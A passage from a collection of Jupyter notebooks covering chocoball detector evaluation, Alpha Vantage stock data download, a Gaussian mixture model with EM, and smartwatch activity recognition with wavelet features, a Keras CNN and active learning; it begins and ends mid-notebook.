np.sum(np.sin(x) * res(beta, x, y))
])
def gd(beta, x, y, f, grad, alpha=0.01):
"""Gradient descent."""
v = 0
for i in range(10000):
v = 0.9 * v + 0.1 * grad(beta, x, y)**2
beta = beta - (alpha * grad(beta, x, y))/(np.sqrt(v) + 1e-8)
return beta
beta = gd(np.array([1,1,1]), x, y, f, grad)
beta
plt.plot(x, y, 'o')
xp = np.linspace(0, 15, 100)
plt.plot(xp, f(beta, xp))
pass
###Output
_____no_output_____ |
notebook/evaluation_chocoball_detector.ipynb | ###Markdown
AboutChocoBallDetectorの学習済みモデルを評価する。評価指標は、チョコボール検出個数のMSE。チョコボール個数を数えることが目的なんで。
###Code
%config Completer.use_jedi = False
from ipywidgets import interact
import ipywidgets as widgets
import logging
from src import util
from src.preprocessor import ChocoPreProcessor
from src.evaluator import ChocoEvaluator
%matplotlib inline
import matplotlib.pyplot as plt
%load_ext autoreload
%autoreload 2
logger = logging.getLogger(__name__)
util.set_logger(logger)
IMG_DIR = "../data/test"
BBOX_DIR = "../data/test"
CLASSES_FILE = "../data/classes.txt"
OUT = "../out"
MODEL = "../out/choco_faster_rcnn.npz"
###Output
_____no_output_____
###Markdown
評価データの前処理
###Code
choco_prep = ChocoPreProcessor(logger=logger)
choco_prep.set_classes(class_file=CLASSES_FILE)
dataset = choco_prep.set_dataset(anno_dir=BBOX_DIR, img_dir=IMG_DIR)
bboxs = choco_prep.get_bbox_list()
imgs = choco_prep.get_img_array()
obj_ids = choco_prep.get_object_ids_list()
classes = choco_prep.get_object_classes()
print(imgs.shape)
###Output
2021-03-25 13:33:40,989 - __main__ - INFO - annotation_file_path: ../data/test
2021-03-25 13:33:40,991 - __main__ - INFO - image_file_path: ../data/test
2021-03-25 13:33:40,993 - __main__ - INFO - annotation_file_size: 7
100%|██████████| 7/7 [00:00<00:00, 188.08it/s]
###Markdown
評価の実行
###Code
ce = ChocoEvaluator(gpu=0)
ce.load_model(model_file=MODEL)
%%time
res_list, mse = ce.evaluate_chocoball_number(images=imgs, true_labels=obj_ids)
print(f"Evaluation Images: {imgs.shape[0]}")
print(f"MSE: {mse}")
###Output
Evaluation Images: 7
MSE: 0.0
###Markdown
推論結果の可視化
###Code
def visualize_detect_image(idx):
fig = plt.figure(figsize=(12, 4))
_ = ce.vis_detect_image(res_list[idx], vis_score=True, fig=fig)
plt.show()
interact(
visualize_detect_image,
idx=widgets.Dropdown(options=list(range(imgs.shape[0])),
value=3,
description="dataset idx")
)
###Output
_____no_output_____ |
notebooks/finance/Historical_Stock_Data.ipynb | ###Markdown
Historical Stock DataThe purpose of this notebook is to download historical trading data for a selected group of the stocks for use with other notebooks. The trading data is stored as individual `.csv` files in a designated directory.
###Code
data_dir = 'data_stocks'
djia = ['AXP','BA','CAT','CSCO','CVX','DD','DIS','GE', \
'GS','HD','IBM','INTC','JNJ','JPM','KO','MCD', \
'MMM','MRK','MSFT','NKE','PFE','PG','T','TRV', \
'UNH','UTX','V','VZ','WMT','XOM']
favs = ['AAPL']
stocks = djia + favs
import os
os.makedirs(data_dir, exist_ok=True)
###Output
_____no_output_____
###Markdown
Alpha VantageThe following cells retrieve a history of daily trading data for a specified set of stock ticker symbols. These functions use the free [Alpha Vantage](https://www.alphavantage.co/) data service.The service requires an personal api key which can be claimed [here](https://www.alphavantage.co/support/api-key) in just a few seconds. Place the key as a string in a file `api_key.txt` in the same directory as this notebook (note: api_key.txt is not distributed with the github repository). The function `api_key()` returns the key stored in `api_key.txt`.
###Code
def api_key():
"Read api_key.txt and return api_key"
try:
with open('api_key.txt') as fp:
line = fp.readline()
except:
raise RuntimeError('Error while attempting to read api_key.txt')
return line.strip()
###Output
_____no_output_____
###Markdown
The function `alphavantage(s)` returns a pandas dataframe holding historical trading data for a stocker ticker symbol specified by `s`.
###Code
import os
import requests
import pandas as pd
def alphavantage(symbol=None):
if symbol is None:
raise ValueError("No symbol has been provided")
payload = {
"function": "TIME_SERIES_DAILY_ADJUSTED",
"symbol": symbol,
"outputsize": "full",
"datatype": "json",
"apikey": api_key(),
}
api_url = "https://www.alphavantage.co/query"
try:
response = requests.get(api_url, params=payload)
except:
raise ValueError("No response using api key: " + api_key)
data = response.json()
k = list(data.keys())
metadata = data[k[0]]
timeseries = data[k[1]]
S = pd.DataFrame.from_dict(timeseries).T
S = S.apply(pd.to_numeric)
S.columns = [h.lstrip('12345678. ') for h in S.columns]
return S
alphavantage('AAPL').head()
###Output
_____no_output_____
###Markdown
`get_stock_data(symbols)` retrieves trading data for a list of symbols and stores each in seperate file in the data directory. The file name is the ticker symbol with a `.csv` suffix.
###Code
def get_stock_data(symbols, service=alphavantage):
if isinstance(symbols, str):
symbols = [symbols]
assert all(isinstance(s, str) for s in symbols)
for s in symbols:
print('downloading', s, end='')
k = 3
while k > 0:
try:
k -= 1
S = service(s)
S.to_csv(os.path.join(data_dir, s + '.csv'))
print(' success')
break
except:
print(' fail', end='')
print('')
get_stock_data(['AAPL'])
###Output
downloading AAPL success
###Markdown
Download Selected Ticker Symbols
###Code
get_stock_data(stocks)
###Output
downloading AXP success
downloading BA success
downloading CAT success
downloading CSCO success
downloading CVX success
downloading DD fail
fail
fail
downloading DIS success
downloading GE success
downloading GS success
downloading HD success
downloading IBM success
downloading INTC success
downloading JNJ success
downloading JPM success
downloading KO success
downloading MCD success
downloading MMM success
downloading MRK success
downloading MSFT success
downloading NKE success
downloading PFE success
downloading PG success
downloading T success
downloading TRV success
downloading UNH success
downloading UTX success
downloading V success
downloading VZ success
downloading WMT success
downloading XOM success
downloading AAPL success
|
notebooks(colab)/Classic_models/GMM_RU.ipynb | ###Markdown
Инициализация
###Code
#@markdown - **Монтирование GoogleDrive**
from google.colab import drive
drive.mount('GoogleDrive')
# #@markdown - **Размонтирование**
# !fusermount -u GoogleDrive
###Output
_____no_output_____
###Markdown
Область кодов
###Code
#@title Модель гауссовых смесей { display-mode: "both" }
# В программе реализована оценка параметров модели гауссовых смесей с помощью ЕМ-алгоритм
# Модель гауссовых смесей для кластеризации стохастических данных
# coding: utf-8
import numpy as np
import numpy.matlib
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
#@markdown - **Привязка данных**
class Bunch(dict):
def __init__(self,*args,**kwds):
super(Bunch,self).__init__(*args,**kwds)
self.__dict__ = self
#@markdown - **Класс модели гауссовых смесей**
class GaussianMM:
def __init__(self):
self.mu = None
self.sigma = None
self.alpha = None
self.f_dim = None
self.num_mixed = None
# Инициализация
def init_fn(self, f_dim=3, num_mixed=4):
self.f_dim = f_dim
self.num_mixed = num_mixed
self.mu = np.random.randn(num_mixed, f_dim) + 10
self.sigma = np.zeros((num_mixed, f_dim, f_dim))
for i in range(num_mixed):
self.sigma[i, :, :] = np.diag(np.random.randint(10, 25, size=(3, )))
self.alpha = [1. / num_mixed] * int(num_mixed)
return 'Initialization completed !'
# e-step
def e_step(self, X):
N, _ = X.shape
expec = np.zeros((N, self.num_mixed))
for i in range(N):
denom = 0
# numer = 0
F_list = []
S_list = []
for j in range(self.num_mixed):
sig_inv = np.linalg.inv(self.sigma[j, :, :])
expo_1 = np.matmul(-(X[i, :] - self.mu[j, :]), sig_inv)
expo_2 = np.matmul(expo_1, ((X[i, :] - self.mu[j, :])).reshape(-1, 1))
first_half = self.alpha[j] * np.exp(expo_2)
# first_half = alpha_[j] * np.exp(-(X[i, :] - mu[j, :]) * sig_inv * ((X[i, :] - mu[j, :])).reshape(-1, 1))
sec_half = np.sqrt(np.linalg.det(np.mat(self.sigma[j, :, :])))
F_list.append(first_half[0])
S_list.append(sec_half)
denom += first_half[0] / sec_half # знаменатель
for j in range(self.num_mixed):
numer = F_list[j] / S_list[j] # числитель
expec[i, j]= numer / denom # ожидание
return expec
# m-step
def m_step(self, X, expec):
N, c = X.shape
lemda = 1e-15
for j in range(self.num_mixed):
denom = 0 # знаменатель
numer = 0 # числитель
sig = 0
for i in range(N):
numer += expec[i, j] * X[i, :]
denom += expec[i, j]
self.mu[j, :] = numer / denom # среднее значение
for i in range(N):
x_tran = (X[i, :] - self.mu[j, :]).reshape(-1, 1)
x_nor = (X[i, :] - self.mu[j, :]).reshape(1, -1)
sig += expec[i, j] * np.matmul(x_tran, x_nor)
self.alpha[j] = denom / N # коэффициенты модели смесей
self.sigma[j, :, :] = sig / denom + np.diag(np.array([lemda] * c))
return self.mu, self.sigma, self.alpha
# Обучение
def fit(self, X, err_mu=5, err_alpha=0.01, max_iter=100):
iter_num = 0
while True:
if iter_num == max_iter: break
iter_num += 1
mu_prev = self.mu.copy()
# print(mu_prev)
alpha_prev = self.alpha.copy()
# print(alpha_prev)
expec = self.e_step(X)
self.mu, self.sigma, self.alpha = self.m_step(X, expec)
print(u"Количество итераций:", iter_num)
print(u"Оценка средних значений:\n", self.mu)
print(u"Оценка коэффициенты модели смесей:\n", self.alpha, '\n')
err = abs(mu_prev - self.mu).sum() # ошибки
err_a = abs(np.array(alpha_prev) - np.array(self.alpha)).sum()
if (err < err_mu) and (err_a < err_alpha):
print(u"\nКонечные ошибки:", [err, err_a])
break
print('Обучение завершено !')
# Прогноз
def predict(self, X):
expec = self.e_step(X)
return np.argmax(expec, axis=1)
#@markdown - **Генератор стохастических данных**
def generate_random(sigma, N, mu1=[15., 25., 10], mu2=[30., 40., 30], mu3=[25., 10., 20], mu4=[40., 30., 40]):
c = sigma.shape[-1]
X = np.zeros((N, c))
target = np.zeros((N,1))
for i in range(N):
if np.random.random(1) < 0.25:
X[i, :] = np.random.multivariate_normal(mu1, sigma[0, :, :], 1) # первая гауссовская модель
target[i] = 0
elif 0.25 <= np.random.random(1) < 0.5:
X[i, :] = np.random.multivariate_normal(mu2, sigma[1, :, :], 1) # вторая гауссовская модель
target[i] = 1
elif 0.5 <= np.random.random(1) < 0.75:
X[i, :] = np.random.multivariate_normal(mu3, sigma[2, :, :], 1) # третья гауссовская модель
target[i] = 2
else:
X[i, :] = np.random.multivariate_normal(mu4, sigma[3, :, :], 1) # четвертая гауссовская модель
target[i] = 3
return X, target
#@markdown - **Стохастические данные**
k, N = 4, 400
sigma = np.zeros((k, 3, 3))
for i in range(k):
sigma[i, :, :] = np.diag(np.random.randint(10, 25, size=(3, )))
sample, target = generate_random(sigma, N)
feature_names = ['x_label', 'y_label', 'z_label']
target_names = ['gaussian1', 'gaussian2', 'gaussian3', 'gaussian4']
data = Bunch(sample=sample, feature_names=feature_names, target=target, target_names=target_names)
#@markdown - **Итеративное обучение до выполнения условия сходимости**
# Инициализация параметров модели
model = GaussianMM()
err_mu = 1e-4 #@param {type: "number"}
err_alpha = 1e-4 #@param {type: "number"}
# -------------Две категории----------------
model.init_fn(f_dim=3, num_mixed=2)
# print('mu:\n', model.mu)
# print('sigma:\n', model.sigma)
# print('alpha:\n', model.alpha)
# Обучение модели
model.fit(data.sample, err_mu=err_mu, err_alpha=err_alpha, max_iter=100)
# Прогноз
tar2 = model.predict(data.sample)
# -------------Три категории----------------
model.init_fn(f_dim=3, num_mixed=3)
model.fit(data.sample, err_mu=err_mu, err_alpha=err_alpha, max_iter=100)
tar3 = model.predict(data.sample)
# -------------Четыре категории----------------
model.init_fn(f_dim=3, num_mixed=4)
model.fit(data.sample, err_mu=err_mu, err_alpha=err_alpha, max_iter=100)
tar4 = model.predict(data.sample)
#@markdown - **Представление распределения обучающих данных и результата кластеризации**
#@markdown - **Обучающие данные и две категории**
titles = ['Random training data', 'Clustered data by 2-GMM']
DATA = [data.sample, data.sample]
color=['b','r','g','y']
fig = plt.figure(1, figsize=(16, 8))
fig.subplots_adjust(wspace=.01, hspace=.02)
for i, title, data_n in zip([1, 2], titles, DATA):
ax = fig.add_subplot(1, 2, i, projection='3d')
if title == 'Random training data':
ax.scatter(data_n[:,0], data_n[:,1], data_n[:,2], c='b', s=35, alpha=0.4, marker='o')
else:
for j in range(N):
ax.scatter(data_n[j, 0], data_n[j, 1], data_n[j, 2], c=color[tar2[j]], s=35, alpha=0.4, marker='P')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.view_init(elev=20., azim=-25)
ax.set_title(title, fontsize=14)
#@markdown - **Три категории и четыре категории**
titles = ['Clustered data by 3-GMM', 'Clustered data by 4-GMM']
TAR = [tar3, tar4]
fig = plt.figure(2, figsize=(16, 8))
fig.subplots_adjust(wspace=.01, hspace=.02)
for i, title, data_n, tar in zip([1, 2], titles, DATA, TAR):
ax = fig.add_subplot(1, 2, i, projection='3d')
for j in range(N):
ax.scatter(data_n[j, 0], data_n[j, 1], data_n[j, 2], c=color[tar[j]], s=35, alpha=0.4, marker='P')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.view_init(elev=20., azim=-25)
ax.set_title(title, fontsize=14)
plt.show()
###Output
_____no_output_____ |
HHAR_watch.ipynb | ###Markdown
Import Statements
###Code
import numpy as np
import scipy
import random
from six.moves import range
# random.seed(5001)
from sklearn.metrics import f1_score, recall_score, confusion_matrix, classification_report
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
import pandas as pd
from scipy.signal import decimate
from scipy.stats import mode
import pywt
import seaborn as sn
from collections import Counter
from keras.utils import to_categorical
import warnings
warnings.filterwarnings('ignore')
###Output
_____no_output_____
###Markdown
Data Extraction
###Code
pa = pd.read_csv("Watch_accelerometer.csv")
# pa=pd.read_csv("Phones_gyroscope.csv")
# wa=pd.read_csv("Watch_accelerometer.csv")
# wg=pd.read_csv("Watch_gyroscope.csv")
print (pa.shape)
print("Done")
pa = pa[pa['gt'] != 'null']
print (pa.shape)
pa = pa.dropna()
print (pa.shape)
acts = pa['gt'].unique()
users = pa['User'].unique()
devices = pa['Device'].unique()
print (devices)
print (acts)
print (users)
l = {}
for i, act in enumerate(acts):
l[act] = i
print (l)
dev = {}
for i, d in enumerate(devices):
dev[d] = i
print (dev)
use = {}
for i, u in enumerate(users):
use[u] = i
print (use)
###Output
_____no_output_____
###Markdown
Train users: a, b, c, d, e, f, g, hTest user: i
###Code
userTrain, userTest = [], []
for i in range(len(users)):
train = []
if i != 8:
train.extend(users[i+1:])
if i != 0:
train.extend(users[:i])
#print (users[i])
userTrain.append(train)
userTest.append(users[i])
print (userTrain, userTest)
def getData(userList):
devs, acc, labels = [], [], []
for user in userList:
pa_user = pa[pa['User'] == user]
for act in acts:
pa_act = pa_user[pa_user['gt'] == act]
for device in devices:
pa_dev = pa_act[pa_act['Device'] == device]
pa_dev = pa_dev[['x', 'y','z']]
if str(device) == 'lgwatch_1' or str(device) == 'lgwatch_2':
min_win = 400
# elif str(device) == 'gear_1' or str(device) == 'gear_2':
else:
min_win = 200
if(pa_dev.shape[0] >= min_win):
acc.append(pa_dev.values)
devs.append(device)
labels.append(l[act])
print (len(labels))
print (f'{user} done')
acc = np.array(acc)
labels = np.array(labels)
devs = np.array(devs)
print ("Done")
print(acc.shape, labels.shape, devs.shape)
return acc, labels, devs
Xtrain1, Ytrain1, devs1 = getData(userTrain[-1])
Xtest1, Ytest1, devs2 = getData(userTest[-1])
###Output
_____no_output_____
###Markdown
Getting the Windowed Data
###Code
def getWindowedData(acc, labels, index, w_min):
windowData, windowLabels = [], []
num_windows = acc[index].shape[0] // w_min
if num_windows == 0:
print(acc[index].shape[0], w_min)
k = 0
for _ in range(num_windows):
windowData.append(acc[index][k:k+w_min])
k += w_min
windowLabels.append(labels[index])
return windowData, windowLabels
# Getting 2 seconds (200 samples) of data for all devices
main_train = []
for i in range(len(Xtrain1)):
if str(devs1[i]) == 'lgwatch_1' or str(devs1[i]) == 'lgwatch_2':
w_min = 400
else:
w_min = 200
main_train.append((getWindowedData(Xtrain1, Ytrain1, i, w_min)))
main_test = []
for i in range(len(Xtest1)):
if str(devs2[i]) == 'lgwatch_1' or str(devs2[i]) == 'lgwatch_2':
w_min = 400
else:
w_min = 200
main_test.append((getWindowedData(Xtest1, Ytest1, i, w_min)))
print (main_train[-1][0][0].shape)
print (main_train[-1][1][0])
###Output
_____no_output_____
###Markdown
Decimating the Windowed Data
###Code
def decimateThatSignal(main, i):
final_decimated_signals = []
label = []
if main[i][0][0].shape[0] == 400:
for j in range(len(main[i][0])):
decimated_signal_0 = decimate(main[i][0][j][:,0], 2)
decimated_signal_1 = decimate(main[i][0][j][:,1], 2)
decimated_signal_2 = decimate(main[i][0][j][:,2], 2)
decimated_signal = np.dstack((decimated_signal_0, decimated_signal_1, decimated_signal_2))
final_decimated_signals.append(decimated_signal)
label.append(main[i][1][j])
return np.array(final_decimated_signals), np.array(label)
else:
return np.array(main[i][0]), np.array(main[i][1])
w_min = 200
Xtrain1 = decimateThatSignal(main_train, 0)[0].reshape((-1, w_min, 3))
Ytrain1 = decimateThatSignal(main_train, 0)[1]
for i in range(1, len(main_train)):
print (i)
Xtrain1, Ytrain1 = np.vstack((Xtrain1, decimateThatSignal(main_train, i)[0].reshape((-1, w_min, 3)))), np.hstack((Ytrain1, decimateThatSignal(main_train, i)[1]))
#mainDecimated.append(DecimateThatSignal(i).reshape((-1, 100, 3)))
Xtrain1 = np.array(Xtrain1)
Ytrain1 = np.array(Ytrain1)
w_min = 200
Xtest1 = decimateThatSignal(main_test, 0)[0].reshape((-1, w_min, 3))
Ytest1 = decimateThatSignal(main_test, 0)[1]
for i in range(1, len(main_test)):
print (i)
Xtest1, Ytest1 = np.vstack((Xtest1, decimateThatSignal(main_test, i)[0].reshape((-1, w_min, 3)))), np.hstack((Ytest1, decimateThatSignal(main_test, i)[1]))
#mainDecimated.append(DecimateThatSignal(i).reshape((-1, 100, 3)))
Xtest1 = np.array(Xtest1)
Ytest1 = np.array(Ytest1)
print (Xtrain1.shape, Ytrain1.shape)
print (Xtest1.shape, Ytest1.shape)
###Output
_____no_output_____
###Markdown
Getting the DWTed Data
###Code
pywt.wavelist()
# Change window size here as and when DWT wavelet changes
w_min = 100+3
def performDWT(x, Y):
masterX = []
for i in range(len(x)):
Xca, Xda = pywt.dwt(x[i].reshape((-1, 3))[:,0], 'db4', mode='periodic')
Yca, Yda = pywt.dwt(x[i].reshape((-1, 3))[:,1], 'db4', mode='periodic')
Zca, Zda = pywt.dwt(x[i].reshape((-1, 3))[:,2], 'db4', mode='periodic')
coef = np.hstack((Xca, Yca, Zca)).reshape((-1, w_min, 3))
masterX.append((coef, Y[i]))
print (i)
masterX = np.array(masterX)
return masterX
masterTrain = performDWT(Xtrain1, Ytrain1)
masterTest = performDWT(Xtest1, Ytest1)
print (masterTrain.shape, masterTest.shape)
###Output
_____no_output_____
###Markdown
Train-Test Split
###Code
#for training
Y_train = []
X_train = np.zeros((masterTrain.shape[0], 1, w_min, 3))
for i in range(masterTrain.shape[0]):
X_train[i, :, :] = masterTrain[i][0][:]
Y_train.append(masterTrain[i][1])
y_train = np.array(Y_train)
#for test
Y_test = []
X_test = np.zeros((masterTest.shape[0], 1, w_min, 3))
for i in range(masterTest.shape[0]):
X_test[i, :, :] = masterTest[i][0][:]
Y_test.append(masterTest[i][1])
y_test = np.array(Y_test)
print (y_train.shape, y_test.shape)
X_train = X_train.reshape((-1, w_min, 3)).astype('float32')
X_test = X_test.reshape((-1, w_min, 3)).astype('float32')
print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)
###Output
_____no_output_____
###Markdown
Params Initialize
###Code
num_classes = 6
img_rows, img_cols = 103, 3
learning_rate = 2e-4
# subset_size = 2000
###Output
_____no_output_____
###Markdown
Train-Valid-Pool Split
###Code
np.bincount(y_test)
X_test, X_pool, y_test, y_pool = train_test_split(X_test, y_test, test_size=0.7, stratify=y_test)
print ('Pool:', X_pool.shape, y_pool.shape)
print ('Test:', X_test.shape, y_test.shape)
###Output
_____no_output_____
###Markdown
Zero-Mean Normalization
###Code
# X_train_All, X_test, y_train_All, y_test = train_test_split(data, labels, stratify=labels, test_size=0.2, random_state=5233)
#X_train, X_test, y_train_All, y_test = train_test_split(data, labels, stratify=labels, test_size=0.2, random_state=5233)
X_train_fit0 = StandardScaler().fit(X_train[:, :, 0])
X_train0 = X_train_fit0.transform(X_train[:, :, 0])
X_train_fit1 = StandardScaler().fit(X_train[:, :, 1])
X_train1 = X_train_fit1.transform(X_train[:, :, 1])
X_train_fit2 = StandardScaler().fit(X_train[:, :, 2])
X_train2 = X_train_fit2.transform(X_train[:, :, 2])
X_pool0 = X_train_fit0.transform(X_pool[:, :, 0])
X_pool1 = X_train_fit1.transform(X_pool[:, :, 1])
X_pool2 = X_train_fit2.transform(X_pool[:, :, 2])
X_test0 = X_train_fit0.transform(X_test[:, :, 0])
X_test1 = X_train_fit1.transform(X_test[:, :, 1])
X_test2 = X_train_fit2.transform(X_test[:, :, 2])
# print (X_train0.shape, X_test0.shape)
X_train = np.dstack((X_train0, X_train1, X_train2))
X_pool = np.dstack((X_pool0, X_pool1, X_pool2))
X_test = np.dstack((X_test0, X_test1, X_test2))
del X_train0, X_train1, X_train2, X_pool0, X_pool1, X_pool2, X_test0, X_test1, X_test2
print (X_train.shape, X_pool.shape, X_test.shape)
print (y_train.shape, y_pool.shape, y_test.shape)
print ('Distribution of Training Classes:', np.bincount(y_train))
Y_train = to_categorical(y_train, num_classes)
Y_test = to_categorical(y_test, num_classes)
Y_pool = to_categorical(y_pool, num_classes)
print ('Distribution of Train Classes:', np.bincount(y_train))
print ('Distribution of Pool Classes:', np.bincount(y_pool))
print ('Distribution of Test Classes:', np.bincount(y_test))
print ('Train:', X_train.shape, Y_train.shape)
print ('Pool:', X_pool.shape, Y_pool.shape)
print ('Test:', X_test.shape, Y_test.shape)
###Output
_____no_output_____
###Markdown
Keras Imports
###Code
import keras
from keras.models import Sequential, Model, load_model
from keras.layers import Dense, Dropout, Input, Flatten, Reshape, concatenate, Lambda
from keras.layers import Conv1D, Conv2D, MaxPooling1D, MaxPooling2D, BatchNormalization
from keras.utils import to_categorical
from keras import backend as K
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, EarlyStopping
X_train0 = X_train[:, :, 0].reshape((-1, w_min, 1))
X_train1 = X_train[:, :, 1].reshape((-1, w_min, 1))
X_train2 = X_train[:, :, 2].reshape((-1, w_min, 1))
X_pool0 = X_pool[:, :, 0].reshape((-1, w_min, 1))
X_pool1 = X_pool[:, :, 1].reshape((-1, w_min, 1))
X_pool2 = X_pool[:, :, 2].reshape((-1, w_min, 1))
X_test0 = X_test[:, :, 0].reshape((-1, w_min, 1))
X_test1 = X_test[:, :, 1].reshape((-1, w_min, 1))
X_test2 = X_test[:, :, 2].reshape((-1, w_min, 1))
print (X_train0.shape, X_pool0.shape, X_test0.shape)
def harnet():
# Model X
inputX = Input(shape=(X_train0.shape[1], X_train0.shape[2]))
convX1 = Conv1D(filters=8, kernel_size=2, padding='same', activation='relu')(inputX)
batchX1 = BatchNormalization()(convX1)
poolX1 = MaxPooling1D(pool_size=2, padding='same')(batchX1)
convX2 = Conv1D(filters=16, kernel_size=2, padding='same', activation='relu')(poolX1)
batchX2 = BatchNormalization()(convX2)
poolX2 = MaxPooling1D(pool_size=2, padding='same')(batchX2)
modelX = Flatten()(poolX2)
# Model Y
inputY = Input(shape=(X_train1.shape[1], X_train2.shape[2]))
convY1 = Conv1D(filters=8, kernel_size=2, padding='same', activation='relu')(inputY)
batchY1 = BatchNormalization()(convY1)
poolY1 = MaxPooling1D(pool_size=2, padding='same')(batchY1)
convY2 = Conv1D(filters=16, kernel_size=2, padding='same', activation='relu')(poolY1)
batchY2 = BatchNormalization()(convY2)
poolY2 = MaxPooling1D(pool_size=2, padding='same')(batchY2)
modelY = Flatten()(poolY2)
# Model Z
inputZ = Input(shape=(X_train2.shape[1], X_train2.shape[2]))
convZ1 = Conv1D(filters=8, kernel_size=2, padding='same', activation='relu')(inputZ)
batchZ1 = BatchNormalization()(convZ1)
poolZ1 = MaxPooling1D(pool_size=2, padding='same')(batchZ1)
convZ2 = Conv1D(filters=16, kernel_size=2, padding='same', activation='relu')(poolZ1)
batchZ2 = BatchNormalization()(convZ2)
poolZ2 = MaxPooling1D(pool_size=2, padding='same')(batchZ2)
# Merge Models X, Y, Z
modelZ = Flatten()(poolZ2)
merged_model = concatenate([modelX, modelY, modelZ])
print (K.int_shape(merged_model))
final_merge = Reshape((K.int_shape(merged_model)[1]//3, 3, 1))(merged_model)
print (K.int_shape(final_merge))
# Conv2D
conv1 = Conv2D(filters=8, kernel_size=(3, 3), padding='same')(final_merge)
batch1 = BatchNormalization()(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2), padding='same')(batch1)
conv2 = Conv2D(filters=16, kernel_size=(3, 3), padding='same')(pool1)
batch2 = BatchNormalization()(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2), padding='same')(batch2)
#drop2d = Lambda(lambda x: K.dropout(x, level=0.25))(pool2)
flatten = Flatten()(pool2)
# Dense
fc1 = Dense(16, activation='relu', kernel_initializer='glorot_normal')(flatten)
# fc1 = Dropout(0.25)(fc1)
# Stochastic Dropout Layer
fc1 = Lambda(lambda x: K.dropout(x, level=0.25))(fc1)
fc2 = Dense(8, activation='relu')(flatten)
# Output Layer - Softmax
output = Dense(num_classes, activation='softmax')(fc2)
# Final Model
model = Model([inputX, inputY, inputZ], output)
model.compile(loss='categorical_crossentropy', optimizer=Adam(learning_rate), metrics=['accuracy']) #beta_1=0.9, beta_2=0.999))
return model
model = harnet()
model.summary()
# save_path = './Save_Files/Watch_User_i.h5'
# checkpoint = ModelCheckpoint(save_path, monitor='val_acc', save_best_only=True, mode='max')
# callback = [checkpoint]
# hist = model.fit([X_train0, X_train1, X_train2], Y_train, epochs=50, batch_size=64, \
# validation_data=([X_test0, X_test1, X_test2], Y_test))#, callbacks=callback)
model = load_model('./Save_Files/Watch_User_i.h5')
# np.save('./Save_Files/hist_Watch_User_i', hist.history)
histC = np.load('./Save_Files/hist_Watch_User_i.npy').tolist()
print (len(histC['val_loss']))
# print (max(hist.history['val_acc']))
print (max(histC['val_acc']))
model.evaluate([X_test0, X_test1, X_test2], Y_test)
y_prob = model.predict([X_test0, X_test1, X_test2])
y_pred = y_prob.argmax(axis=-1)
y_true = np.array([np.argmax(y) for y in Y_test])
print (y_true.shape, y_pred.shape)
###Output
_____no_output_____
###Markdown
Preprocess for Active Learning
###Code
subset_size = X_pool.shape[0]
subset_indices = np.asarray(random.sample(range(0, X_pool.shape[0]), subset_size))
X_pool_subset = X_pool[subset_indices]
Y_pool_subset = Y_pool[subset_indices]
# X_pool_new = np.delete(X_pool, subset_indices, axis=0)
# Y_pool_new = np.delete(Y_pool, subset_indices, axis=0)
print (X_pool_subset.shape, Y_pool_subset.shape)
# print (X_pool_new.shape, Y_pool_new.shape)
X_pool_subset0 = X_pool_subset[:, :, 0].reshape((-1, w_min, 1))
X_pool_subset1 = X_pool_subset[:, :, 1].reshape((-1, w_min, 1))
X_pool_subset2 = X_pool_subset[:, :, 2].reshape((-1, w_min, 1))
print (X_pool_subset0.shape, X_pool_subset1.shape, X_pool_subset2.shape)
pool_min = 0
pool_max = int(0.6*X_pool_subset.shape[0])
pool_iter = pool_max//8
print (pool_min, pool_max, pool_iter)
pool_percents = np.arange(12.5, 101, 12.5)
print (pool_percents)
from acquisition_functions import bald, varratio, maxentropy, random_acq
###Output
_____no_output_____
###Markdown
BALD
###Code
acc_inc_bald, f1_inc_bald, recall_inc_bald = [], [], []
# Acquisition queries 8 times
for n_queries in range(pool_min, pool_max, pool_iter)[1:]:
print ('Queries:', n_queries)
model = load_model('./Save_Files/Watch_User_i.h5')
bald_uncertainty_estimates = bald([X_pool_subset0, X_pool_subset1, X_pool_subset2], \
num_classes, model, 16, 10)
bald_uncertainty_estimates = bald_uncertainty_estimates.flatten()
acquired_indices = bald_uncertainty_estimates.argsort()[-n_queries:][::-1]
X_acquired_bald = X_pool[acquired_indices]
Y_acquired_bald = Y_pool[acquired_indices]
print ('BALD Acquired Shape:', X_acquired_bald.shape, Y_acquired_bald.shape)
y_acquired_bald = Y_acquired_bald.argmax(axis=-1)
np.bincount(y_acquired_bald)
# Incremental Learning
X_acquired0 = X_acquired_bald[:, :, 0].reshape((-1, w_min, 1))
X_acquired1 = X_acquired_bald[:, :, 1].reshape((-1, w_min, 1))
X_acquired2 = X_acquired_bald[:, :, 2].reshape((-1, w_min, 1))
print (X_acquired0.shape, X_acquired1.shape, X_acquired2.shape)
hist = model.fit([X_acquired0, X_acquired1, X_acquired2], Y_acquired_bald, epochs=30, batch_size=4, \
validation_data=([X_test0, X_test1, X_test2], Y_test))
inc_acc = max(hist.history['val_acc'])
model.evaluate([X_test0, X_test1, X_test2], Y_test, batch_size=8)
print ('Incremental Learning:', inc_acc)
acc_inc_bald.append(inc_acc)
y_prob = model.predict([X_test0, X_test1, X_test2], batch_size=8)
y_pred = y_prob.argmax(axis=-1)
f1_inc_bald.append(f1_score(y_test, y_pred, average='weighted'))
recall_inc_bald.append(recall_score(y_test, y_pred, average='weighted'))
print ()
###Output
_____no_output_____
###Markdown
Var Ratio
###Code
acc_inc_var, f1_inc_var, recall_inc_var = [], [], []
# Acquisition queries 8 times
for n_queries in range(pool_min, pool_max, pool_iter)[1:]:
print ('Queries:', n_queries)
model = load_model('./Save_Files/Watch_User_i.h5')
var_uncertainty_estimates = varratio([X_pool_subset0, X_pool_subset1, X_pool_subset2], \
num_classes, model, 16, 10)
var_uncertainty_estimates = var_uncertainty_estimates.flatten()
acquired_indices = var_uncertainty_estimates.argsort()[-n_queries:][::-1]
X_acquired_var = X_pool[acquired_indices]
Y_acquired_var = Y_pool[acquired_indices]
print ('Var Ratio Acquired Shape:', X_acquired_var.shape, Y_acquired_var.shape)
y_acquired_var = Y_acquired_var.argmax(axis=-1)
np.bincount(y_acquired_var)
# Incremental Learning
